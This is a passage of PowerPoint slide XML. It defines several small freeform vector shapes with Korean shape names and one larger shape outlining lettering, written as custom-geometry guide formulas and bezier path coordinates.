                        <a:pt x="57341" y="4838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8" name="자유형: 도형 80">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7623339F-92D8-DB45-A4F9-1E9B6AAEB9A3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7920012" y="3170121"/>
                  <a:ext cx="47625" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 47625"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 38100"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 47625"/>
                    <a:gd name="connsiteY1" fmla="*/ 42291 h 38100"/>
                    <a:gd name="connsiteX2" fmla="*/ 32575 w 47625"/>
                    <a:gd name="connsiteY2" fmla="*/ 42291 h 38100"/>
                    <a:gd name="connsiteX3" fmla="*/ 51911 w 47625"/>
                    <a:gd name="connsiteY3" fmla="*/ 20669 h 38100"/>
                    <a:gd name="connsiteX4" fmla="*/ 32194 w 47625"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 38100"/>
                    <a:gd name="connsiteX5" fmla="*/ 0 w 47625"/>
                    <a:gd name="connsiteY5" fmla="*/ 0 h 38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7625" h="38100">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="42291"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32575" y="42291"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="45148" y="42291"/>
                        <a:pt x="51911" y="34861"/>
                        <a:pt x="51911" y="20669"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51911" y="3429"/>
                        <a:pt x="42577" y="0"/>
                        <a:pt x="32194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49" name="자유형: 도형 81">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B04FF4BE-3A60-4F47-8C73-CC3B33231FCC}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7978305" y="3733620"/>
                  <a:ext cx="28575" cy="28575"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 15240 w 28575"/>
                    <a:gd name="connsiteY0" fmla="*/ 29051 h 28575"/>
                    <a:gd name="connsiteX1" fmla="*/ 30480 w 28575"/>
                    <a:gd name="connsiteY1" fmla="*/ 14764 h 28575"/>
                    <a:gd name="connsiteX2" fmla="*/ 15240 w 28575"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 28575"/>
                    <a:gd name="connsiteX3" fmla="*/ 0 w 28575"/>
                    <a:gd name="connsiteY3" fmla="*/ 14764 h 28575"/>
                    <a:gd name="connsiteX4" fmla="*/ 15240 w 28575"/>
                    <a:gd name="connsiteY4" fmla="*/ 29051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575" h="28575">
                      <a:moveTo>
                        <a:pt x="15240" y="29051"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="24003" y="29051"/>
                        <a:pt x="30480" y="23908"/>
                        <a:pt x="30480" y="14764"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30480" y="5239"/>
                        <a:pt x="23717" y="0"/>
                        <a:pt x="15240" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6763" y="0"/>
                        <a:pt x="0" y="5239"/>
                        <a:pt x="0" y="14764"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="23908"/>
                        <a:pt x="6477" y="29051"/>
                        <a:pt x="15240" y="29051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50" name="자유형: 도형 82">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7625C06D-E400-634B-9DA3-CF20ABF6B16E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7822000" y="3734287"/>
                  <a:ext cx="28575" cy="66675"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 17717 w 28575"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 66675"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 28575"/>
                    <a:gd name="connsiteY1" fmla="*/ 37243 h 66675"/>
                    <a:gd name="connsiteX2" fmla="*/ 17717 w 28575"/>
                    <a:gd name="connsiteY2" fmla="*/ 74485 h 66675"/>
                    <a:gd name="connsiteX3" fmla="*/ 35433 w 28575"/>
                    <a:gd name="connsiteY3" fmla="*/ 37243 h 66675"/>
                    <a:gd name="connsiteX4" fmla="*/ 17717 w 28575"/>
                    <a:gd name="connsiteY4" fmla="*/ 0 h 666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575" h="66675">
                      <a:moveTo>
                        <a:pt x="17717" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3905" y="0"/>
                        <a:pt x="0" y="17050"/>
                        <a:pt x="0" y="37243"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="57436"/>
                        <a:pt x="3905" y="74485"/>
                        <a:pt x="17717" y="74485"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31528" y="74485"/>
                        <a:pt x="35433" y="57436"/>
                        <a:pt x="35433" y="37243"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35433" y="17050"/>
                        <a:pt x="31528" y="0"/>
                        <a:pt x="17717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51" name="자유형: 도형 83">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C220620-BFC3-E240-8F39-AD93D71209E8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7975162" y="3774483"/>
                  <a:ext cx="28575" cy="28575"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 18383 w 28575"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 28575"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 28575"/>
                    <a:gd name="connsiteY1" fmla="*/ 17050 h 28575"/>
                    <a:gd name="connsiteX2" fmla="*/ 18383 w 28575"/>
                    <a:gd name="connsiteY2" fmla="*/ 35052 h 28575"/>
                    <a:gd name="connsiteX3" fmla="*/ 36767 w 28575"/>
                    <a:gd name="connsiteY3" fmla="*/ 17050 h 28575"/>
                    <a:gd name="connsiteX4" fmla="*/ 18383 w 28575"/>
                    <a:gd name="connsiteY4" fmla="*/ 0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575" h="28575">
                      <a:moveTo>
                        <a:pt x="18383" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7906" y="0"/>
                        <a:pt x="0" y="6382"/>
                        <a:pt x="0" y="17050"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="28384"/>
                        <a:pt x="7906" y="35052"/>
                        <a:pt x="18383" y="35052"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28861" y="35052"/>
                        <a:pt x="36767" y="28384"/>
                        <a:pt x="36767" y="17050"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36767" y="6286"/>
                        <a:pt x="28861" y="0"/>
                        <a:pt x="18383" y="0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52" name="자유형: 도형 84">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5293F792-99A4-4B40-895E-22410D71602B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7319556" y="2405359"/>
                  <a:ext cx="1114425" cy="1514475"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 1114425"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 1514475"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 1114425"/>
                    <a:gd name="connsiteY1" fmla="*/ 1406081 h 1514475"/>
                    <a:gd name="connsiteX2" fmla="*/ 438626 w 1114425"/>
                    <a:gd name="connsiteY2" fmla="*/ 1503998 h 1514475"/>
                    <a:gd name="connsiteX3" fmla="*/ 559118 w 1114425"/>
                    <a:gd name="connsiteY3" fmla="*/ 1517142 h 1514475"/>
                    <a:gd name="connsiteX4" fmla="*/ 679609 w 1114425"/>
                    <a:gd name="connsiteY4" fmla="*/ 1503998 h 1514475"/>
                    <a:gd name="connsiteX5" fmla="*/ 1118235 w 1114425"/>
                    <a:gd name="connsiteY5" fmla="*/ 1406081 h 1514475"/>
                    <a:gd name="connsiteX6" fmla="*/ 1118235 w 1114425"/>
                    <a:gd name="connsiteY6" fmla="*/ 0 h 1514475"/>
                    <a:gd name="connsiteX7" fmla="*/ 0 w 1114425"/>
                    <a:gd name="connsiteY7" fmla="*/ 0 h 1514475"/>
                    <a:gd name="connsiteX8" fmla="*/ 476250 w 1114425"/>
                    <a:gd name="connsiteY8" fmla="*/ 1400461 h 1514475"/>
                    <a:gd name="connsiteX9" fmla="*/ 476250 w 1114425"/>
                    <a:gd name="connsiteY9" fmla="*/ 1414558 h 1514475"/>
                    <a:gd name="connsiteX10" fmla="*/ 410147 w 1114425"/>
                    <a:gd name="connsiteY10" fmla="*/ 1414558 h 1514475"/>
                    <a:gd name="connsiteX11" fmla="*/ 431483 w 1114425"/>
                    <a:gd name="connsiteY11" fmla="*/ 1377887 h 1514475"/>
                    <a:gd name="connsiteX12" fmla="*/ 460629 w 1114425"/>
                    <a:gd name="connsiteY12" fmla="*/ 1346073 h 1514475"/>
                    <a:gd name="connsiteX13" fmla="*/ 444341 w 1114425"/>
                    <a:gd name="connsiteY13" fmla="*/ 1328928 h 1514475"/>
                    <a:gd name="connsiteX14" fmla="*/ 427768 w 1114425"/>
                    <a:gd name="connsiteY14" fmla="*/ 1353122 h 1514475"/>
                    <a:gd name="connsiteX15" fmla="*/ 411956 w 1114425"/>
                    <a:gd name="connsiteY15" fmla="*/ 1353122 h 1514475"/>
                    <a:gd name="connsiteX16" fmla="*/ 445294 w 1114425"/>
                    <a:gd name="connsiteY16" fmla="*/ 1315784 h 1514475"/>
                    <a:gd name="connsiteX17" fmla="*/ 476441 w 1114425"/>
                    <a:gd name="connsiteY17" fmla="*/ 1345502 h 1514475"/>
                    <a:gd name="connsiteX18" fmla="*/ 454819 w 1114425"/>
                    <a:gd name="connsiteY18" fmla="*/ 1378172 h 1514475"/>
                    <a:gd name="connsiteX19" fmla="*/ 429101 w 1114425"/>
                    <a:gd name="connsiteY19" fmla="*/ 1400461 h 1514475"/>
                    <a:gd name="connsiteX20" fmla="*/ 476250 w 1114425"/>
                    <a:gd name="connsiteY20" fmla="*/ 1400461 h 1514475"/>
                    <a:gd name="connsiteX21" fmla="*/ 520160 w 1114425"/>
                    <a:gd name="connsiteY21" fmla="*/ 1416558 h 1514475"/>
                    <a:gd name="connsiteX22" fmla="*/ 486632 w 1114425"/>
                    <a:gd name="connsiteY22" fmla="*/ 1366171 h 1514475"/>
                    <a:gd name="connsiteX23" fmla="*/ 520160 w 1114425"/>
                    <a:gd name="connsiteY23" fmla="*/ 1315784 h 1514475"/>
                    <a:gd name="connsiteX24" fmla="*/ 553688 w 1114425"/>
                    <a:gd name="connsiteY24" fmla="*/ 1366171 h 1514475"/>
                    <a:gd name="connsiteX25" fmla="*/ 520160 w 1114425"/>
                    <a:gd name="connsiteY25" fmla="*/ 1416558 h 1514475"/>
                    <a:gd name="connsiteX26" fmla="*/ 607028 w 1114425"/>
                    <a:gd name="connsiteY26" fmla="*/ 1414558 h 1514475"/>
                    <a:gd name="connsiteX27" fmla="*/ 589693 w 1114425"/>
                    <a:gd name="connsiteY27" fmla="*/ 1414558 h 1514475"/>
                    <a:gd name="connsiteX28" fmla="*/ 589693 w 1114425"/>
                    <a:gd name="connsiteY28" fmla="*/ 1346168 h 1514475"/>
                    <a:gd name="connsiteX29" fmla="*/ 565880 w 1114425"/>
                    <a:gd name="connsiteY29" fmla="*/ 1346168 h 1514475"/>
                    <a:gd name="connsiteX30" fmla="*/ 565880 w 1114425"/>
                    <a:gd name="connsiteY30" fmla="*/ 1333691 h 1514475"/>
                    <a:gd name="connsiteX31" fmla="*/ 594074 w 1114425"/>
                    <a:gd name="connsiteY31" fmla="*/ 1317593 h 1514475"/>
                    <a:gd name="connsiteX32" fmla="*/ 606933 w 1114425"/>
                    <a:gd name="connsiteY32" fmla="*/ 1317593 h 1514475"/>
                    <a:gd name="connsiteX33" fmla="*/ 606933 w 1114425"/>
                    <a:gd name="connsiteY33" fmla="*/ 1414558 h 1514475"/>
                    <a:gd name="connsiteX34" fmla="*/ 673989 w 1114425"/>
                    <a:gd name="connsiteY34" fmla="*/ 1416558 h 1514475"/>
                    <a:gd name="connsiteX35" fmla="*/ 639794 w 1114425"/>
                    <a:gd name="connsiteY35" fmla="*/ 1386078 h 1514475"/>
                    <a:gd name="connsiteX36" fmla="*/ 657511 w 1114425"/>
                    <a:gd name="connsiteY36" fmla="*/ 1362456 h 1514475"/>
                    <a:gd name="connsiteX37" fmla="*/ 657511 w 1114425"/>
                    <a:gd name="connsiteY37" fmla="*/ 1362170 h 1514475"/>
                    <a:gd name="connsiteX38" fmla="*/ 643795 w 1114425"/>
                    <a:gd name="connsiteY38" fmla="*/ 1342263 h 1514475"/>
                    <a:gd name="connsiteX39" fmla="*/ 673989 w 1114425"/>
                    <a:gd name="connsiteY39" fmla="*/ 1315879 h 1514475"/>
                    <a:gd name="connsiteX40" fmla="*/ 704183 w 1114425"/>
                    <a:gd name="connsiteY40" fmla="*/ 1342263 h 1514475"/>
                    <a:gd name="connsiteX41" fmla="*/ 690467 w 1114425"/>
                    <a:gd name="connsiteY41" fmla="*/ 1362170 h 1514475"/>
                    <a:gd name="connsiteX42" fmla="*/ 690467 w 1114425"/>
                    <a:gd name="connsiteY42" fmla="*/ 1362456 h 1514475"/>
                    <a:gd name="connsiteX43" fmla="*/ 708184 w 1114425"/>
                    <a:gd name="connsiteY43" fmla="*/ 1386078 h 1514475"/>
                    <a:gd name="connsiteX44" fmla="*/ 673989 w 1114425"/>
                    <a:gd name="connsiteY44" fmla="*/ 1416558 h 1514475"/>
                    <a:gd name="connsiteX45" fmla="*/ 1107377 w 1114425"/>
                    <a:gd name="connsiteY45" fmla="*/ 1256633 h 1514475"/>
                    <a:gd name="connsiteX46" fmla="*/ 10954 w 1114425"/>
                    <a:gd name="connsiteY46" fmla="*/ 1256633 h 1514475"/>
                    <a:gd name="connsiteX47" fmla="*/ 10954 w 1114425"/>
                    <a:gd name="connsiteY47" fmla="*/ 980789 h 1514475"/>
                    <a:gd name="connsiteX48" fmla="*/ 1107377 w 1114425"/>
                    <a:gd name="connsiteY48" fmla="*/ 980789 h 1514475"/>
                    <a:gd name="connsiteX49" fmla="*/ 1107377 w 1114425"/>
                    <a:gd name="connsiteY49" fmla="*/ 1256633 h 1514475"/>
                    <a:gd name="connsiteX50" fmla="*/ 172688 w 1114425"/>
                    <a:gd name="connsiteY50" fmla="*/ 642366 h 1514475"/>
                    <a:gd name="connsiteX51" fmla="*/ 172688 w 1114425"/>
                    <a:gd name="connsiteY51" fmla="*/ 659797 h 1514475"/>
                    <a:gd name="connsiteX52" fmla="*/ 121158 w 1114425"/>
                    <a:gd name="connsiteY52" fmla="*/ 659797 h 1514475"/>
                    <a:gd name="connsiteX53" fmla="*/ 121158 w 1114425"/>
                    <a:gd name="connsiteY53" fmla="*/ 695515 h 1514475"/>
                    <a:gd name="connsiteX54" fmla="*/ 177832 w 1114425"/>
                    <a:gd name="connsiteY54" fmla="*/ 695515 h 1514475"/>
                    <a:gd name="connsiteX55" fmla="*/ 177832 w 1114425"/>
                    <a:gd name="connsiteY55" fmla="*/ 713994 h 1514475"/>
                    <a:gd name="connsiteX56" fmla="*/ 103346 w 1114425"/>
                    <a:gd name="connsiteY56" fmla="*/ 713994 h 1514475"/>
                    <a:gd name="connsiteX57" fmla="*/ 103346 w 1114425"/>
                    <a:gd name="connsiteY57" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX58" fmla="*/ 176879 w 1114425"/>
                    <a:gd name="connsiteY58" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX59" fmla="*/ 176879 w 1114425"/>
                    <a:gd name="connsiteY59" fmla="*/ 610457 h 1514475"/>
                    <a:gd name="connsiteX60" fmla="*/ 121253 w 1114425"/>
                    <a:gd name="connsiteY60" fmla="*/ 610457 h 1514475"/>
                    <a:gd name="connsiteX61" fmla="*/ 121253 w 1114425"/>
                    <a:gd name="connsiteY61" fmla="*/ 642461 h 1514475"/>
                    <a:gd name="connsiteX62" fmla="*/ 172688 w 1114425"/>
                    <a:gd name="connsiteY62" fmla="*/ 642461 h 1514475"/>
                    <a:gd name="connsiteX63" fmla="*/ 184594 w 1114425"/>
                    <a:gd name="connsiteY63" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX64" fmla="*/ 205931 w 1114425"/>
                    <a:gd name="connsiteY64" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX65" fmla="*/ 229076 w 1114425"/>
                    <a:gd name="connsiteY65" fmla="*/ 635032 h 1514475"/>
                    <a:gd name="connsiteX66" fmla="*/ 253270 w 1114425"/>
                    <a:gd name="connsiteY66" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX67" fmla="*/ 273272 w 1114425"/>
                    <a:gd name="connsiteY67" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX68" fmla="*/ 239554 w 1114425"/>
                    <a:gd name="connsiteY68" fmla="*/ 650843 h 1514475"/>
                    <a:gd name="connsiteX69" fmla="*/ 275749 w 1114425"/>
                    <a:gd name="connsiteY69" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX70" fmla="*/ 254032 w 1114425"/>
                    <a:gd name="connsiteY70" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX71" fmla="*/ 228600 w 1114425"/>
                    <a:gd name="connsiteY71" fmla="*/ 667417 h 1514475"/>
                    <a:gd name="connsiteX72" fmla="*/ 202692 w 1114425"/>
                    <a:gd name="connsiteY72" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX73" fmla="*/ 182213 w 1114425"/>
                    <a:gd name="connsiteY73" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX74" fmla="*/ 218408 w 1114425"/>
                    <a:gd name="connsiteY74" fmla="*/ 650843 h 1514475"/>
                    <a:gd name="connsiteX75" fmla="*/ 184594 w 1114425"/>
                    <a:gd name="connsiteY75" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX76" fmla="*/ 329660 w 1114425"/>
                    <a:gd name="connsiteY76" fmla="*/ 699516 h 1514475"/>
                    <a:gd name="connsiteX77" fmla="*/ 355664 w 1114425"/>
                    <a:gd name="connsiteY77" fmla="*/ 667512 h 1514475"/>
                    <a:gd name="connsiteX78" fmla="*/ 373094 w 1114425"/>
                    <a:gd name="connsiteY78" fmla="*/ 667512 h 1514475"/>
                    <a:gd name="connsiteX79" fmla="*/ 329565 w 1114425"/>
                    <a:gd name="connsiteY79" fmla="*/ 716947 h 1514475"/>
                    <a:gd name="connsiteX80" fmla="*/ 280607 w 1114425"/>
                    <a:gd name="connsiteY80" fmla="*/ 653034 h 1514475"/>
                    <a:gd name="connsiteX81" fmla="*/ 329565 w 1114425"/>
                    <a:gd name="connsiteY81" fmla="*/ 589121 h 1514475"/>
                    <a:gd name="connsiteX82" fmla="*/ 372904 w 1114425"/>
                    <a:gd name="connsiteY82" fmla="*/ 630841 h 1514475"/>
                    <a:gd name="connsiteX83" fmla="*/ 354997 w 1114425"/>
                    <a:gd name="connsiteY83" fmla="*/ 630841 h 1514475"/>
                    <a:gd name="connsiteX84" fmla="*/ 329565 w 1114425"/>
                    <a:gd name="connsiteY84" fmla="*/ 606552 h 1514475"/>
                    <a:gd name="connsiteX85" fmla="*/ 298514 w 1114425"/>
                    <a:gd name="connsiteY85" fmla="*/ 653034 h 1514475"/>
                    <a:gd name="connsiteX86" fmla="*/ 329660 w 1114425"/>
                    <a:gd name="connsiteY86" fmla="*/ 699516 h 1514475"/>
                    <a:gd name="connsiteX87" fmla="*/ 458819 w 1114425"/>
                    <a:gd name="connsiteY87" fmla="*/ 642366 h 1514475"/>
                    <a:gd name="connsiteX88" fmla="*/ 458819 w 1114425"/>
                    <a:gd name="connsiteY88" fmla="*/ 659797 h 1514475"/>
                    <a:gd name="connsiteX89" fmla="*/ 407289 w 1114425"/>
                    <a:gd name="connsiteY89" fmla="*/ 659797 h 1514475"/>
                    <a:gd name="connsiteX90" fmla="*/ 407289 w 1114425"/>
                    <a:gd name="connsiteY90" fmla="*/ 695515 h 1514475"/>
                    <a:gd name="connsiteX91" fmla="*/ 463963 w 1114425"/>
                    <a:gd name="connsiteY91" fmla="*/ 695515 h 1514475"/>
                    <a:gd name="connsiteX92" fmla="*/ 463963 w 1114425"/>
                    <a:gd name="connsiteY92" fmla="*/ 713994 h 1514475"/>
                    <a:gd name="connsiteX93" fmla="*/ 389477 w 1114425"/>
                    <a:gd name="connsiteY93" fmla="*/ 713994 h 1514475"/>
                    <a:gd name="connsiteX94" fmla="*/ 389477 w 1114425"/>
                    <a:gd name="connsiteY94" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX95" fmla="*/ 463010 w 1114425"/>
                    <a:gd name="connsiteY95" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX96" fmla="*/ 463010 w 1114425"/>
                    <a:gd name="connsiteY96" fmla="*/ 610457 h 1514475"/>
                    <a:gd name="connsiteX97" fmla="*/ 407384 w 1114425"/>
                    <a:gd name="connsiteY97" fmla="*/ 610457 h 1514475"/>
                    <a:gd name="connsiteX98" fmla="*/ 407384 w 1114425"/>
                    <a:gd name="connsiteY98" fmla="*/ 642461 h 1514475"/>
                    <a:gd name="connsiteX99" fmla="*/ 458819 w 1114425"/>
                    <a:gd name="connsiteY99" fmla="*/ 642461 h 1514475"/>
                    <a:gd name="connsiteX100" fmla="*/ 401955 w 1114425"/>
                    <a:gd name="connsiteY100" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX101" fmla="*/ 424148 w 1114425"/>
                    <a:gd name="connsiteY101" fmla="*/ 848868 h 1514475"/>
                    <a:gd name="connsiteX102" fmla="*/ 424434 w 1114425"/>
                    <a:gd name="connsiteY102" fmla="*/ 848868 h 1514475"/>
                    <a:gd name="connsiteX103" fmla="*/ 445580 w 1114425"/>
                    <a:gd name="connsiteY103" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX104" fmla="*/ 465773 w 1114425"/>
                    <a:gd name="connsiteY104" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX105" fmla="*/ 434531 w 1114425"/>
                    <a:gd name="connsiteY105" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX106" fmla="*/ 414338 w 1114425"/>
                    <a:gd name="connsiteY106" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX107" fmla="*/ 391668 w 1114425"/>
                    <a:gd name="connsiteY107" fmla="*/ 777240 h 1514475"/>
                    <a:gd name="connsiteX108" fmla="*/ 391382 w 1114425"/>
                    <a:gd name="connsiteY108" fmla="*/ 777240 h 1514475"/>
                    <a:gd name="connsiteX109" fmla="*/ 368237 w 1114425"/>
                    <a:gd name="connsiteY109" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX110" fmla="*/ 347663 w 1114425"/>
                    <a:gd name="connsiteY110" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX111" fmla="*/ 317849 w 1114425"/>
                    <a:gd name="connsiteY111" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX112" fmla="*/ 338042 w 1114425"/>
                    <a:gd name="connsiteY112" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX113" fmla="*/ 358521 w 1114425"/>
                    <a:gd name="connsiteY113" fmla="*/ 848868 h 1514475"/>
                    <a:gd name="connsiteX114" fmla="*/ 358807 w 1114425"/>
                    <a:gd name="connsiteY114" fmla="*/ 848868 h 1514475"/>
                    <a:gd name="connsiteX115" fmla="*/ 381667 w 1114425"/>
                    <a:gd name="connsiteY115" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX116" fmla="*/ 401955 w 1114425"/>
                    <a:gd name="connsiteY116" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX117" fmla="*/ 549307 w 1114425"/>
                    <a:gd name="connsiteY117" fmla="*/ 695611 h 1514475"/>
                    <a:gd name="connsiteX118" fmla="*/ 549307 w 1114425"/>
                    <a:gd name="connsiteY118" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX119" fmla="*/ 479489 w 1114425"/>
                    <a:gd name="connsiteY119" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX120" fmla="*/ 479489 w 1114425"/>
                    <a:gd name="connsiteY120" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX121" fmla="*/ 497396 w 1114425"/>
                    <a:gd name="connsiteY121" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX122" fmla="*/ 497396 w 1114425"/>
                    <a:gd name="connsiteY122" fmla="*/ 695611 h 1514475"/>
                    <a:gd name="connsiteX123" fmla="*/ 549307 w 1114425"/>
                    <a:gd name="connsiteY123" fmla="*/ 695611 h 1514475"/>
                    <a:gd name="connsiteX124" fmla="*/ 505111 w 1114425"/>
                    <a:gd name="connsiteY124" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX125" fmla="*/ 526256 w 1114425"/>
                    <a:gd name="connsiteY125" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX126" fmla="*/ 569881 w 1114425"/>
                    <a:gd name="connsiteY126" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX127" fmla="*/ 548640 w 1114425"/>
                    <a:gd name="connsiteY127" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX128" fmla="*/ 537972 w 1114425"/>
                    <a:gd name="connsiteY128" fmla="*/ 844963 h 1514475"/>
                    <a:gd name="connsiteX129" fmla="*/ 492728 w 1114425"/>
                    <a:gd name="connsiteY129" fmla="*/ 844963 h 1514475"/>
                    <a:gd name="connsiteX130" fmla="*/ 482060 w 1114425"/>
                    <a:gd name="connsiteY130" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX131" fmla="*/ 461582 w 1114425"/>
                    <a:gd name="connsiteY131" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX132" fmla="*/ 505111 w 1114425"/>
                    <a:gd name="connsiteY132" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX133" fmla="*/ 631412 w 1114425"/>
                    <a:gd name="connsiteY133" fmla="*/ 695611 h 1514475"/>
                    <a:gd name="connsiteX134" fmla="*/ 631412 w 1114425"/>
                    <a:gd name="connsiteY134" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX135" fmla="*/ 561594 w 1114425"/>
                    <a:gd name="connsiteY135" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX136" fmla="*/ 561594 w 1114425"/>
                    <a:gd name="connsiteY136" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX137" fmla="*/ 579501 w 1114425"/>
                    <a:gd name="connsiteY137" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX138" fmla="*/ 579501 w 1114425"/>
                    <a:gd name="connsiteY138" fmla="*/ 695611 h 1514475"/>
                    <a:gd name="connsiteX139" fmla="*/ 631412 w 1114425"/>
                    <a:gd name="connsiteY139" fmla="*/ 695611 h 1514475"/>
                    <a:gd name="connsiteX140" fmla="*/ 713137 w 1114425"/>
                    <a:gd name="connsiteY140" fmla="*/ 642366 h 1514475"/>
                    <a:gd name="connsiteX141" fmla="*/ 713137 w 1114425"/>
                    <a:gd name="connsiteY141" fmla="*/ 659797 h 1514475"/>
                    <a:gd name="connsiteX142" fmla="*/ 661607 w 1114425"/>
                    <a:gd name="connsiteY142" fmla="*/ 659797 h 1514475"/>
                    <a:gd name="connsiteX143" fmla="*/ 661607 w 1114425"/>
                    <a:gd name="connsiteY143" fmla="*/ 695515 h 1514475"/>
                    <a:gd name="connsiteX144" fmla="*/ 718280 w 1114425"/>
                    <a:gd name="connsiteY144" fmla="*/ 695515 h 1514475"/>
                    <a:gd name="connsiteX145" fmla="*/ 718280 w 1114425"/>
                    <a:gd name="connsiteY145" fmla="*/ 713994 h 1514475"/>
